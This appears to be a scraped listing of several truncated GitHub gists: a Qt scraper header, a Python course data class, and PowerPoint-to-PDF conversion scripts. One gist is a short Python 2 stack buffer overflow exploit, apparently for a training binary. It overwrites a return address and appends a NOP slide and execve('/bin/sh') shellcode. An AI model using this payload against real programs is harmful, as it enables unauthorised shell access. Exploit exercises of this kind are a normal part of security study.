This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "scraper.h" | |
| #include "ui_scraper.h" | |
| #include <QTimer> | |
| #include <QWebEngineProfile> | |
| #include <QWebEngineCookieStore> | |
| #include <QNetworkCookie> | |
| #include <QJsonDocument> | |
| #include <QJsonArray> | |
| #include <QJsonObject> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| padding = 'A'*80 | |
| ret = struct.pack('I', 0x080484f9) | |
| esp = struct.pack('I', 0xbffff7c0+32) | |
| nopslide = "\x90"*100 | |
| # trap = "\xCC"*100 | |
| trap = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" | |
| print padding + ret + esp + nopslide + trap |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/env python | |
| from typing import List | |
| class Ders: | |
| length : int | |
| name : str | |
| path : str | |
| def __init__(self, name : str, length : int, path : str = ""): | |
| self.name = name |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import shutil | |
| from pathlib import Path | |
| from dataclasses import dataclass | |
| import comtypes.client | |
| @dataclass | |
| class Item: | |
| name: str |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import comtypes.client | |
| import shutil | |
| from pathlib import Path | |
| # Function is from this answer: https://stackoverflow.com/a/31624001 | |
| def PPTtoPDF(inputFileName, outputFileName, formatType = 32): | |
| powerpoint = comtypes.client.CreateObject("Powerpoint.Application") | |
| powerpoint.Visible = 1 | |
| deck = powerpoint.Presentations.Open(inputFileName) | |
| if deck.ReadOnly: |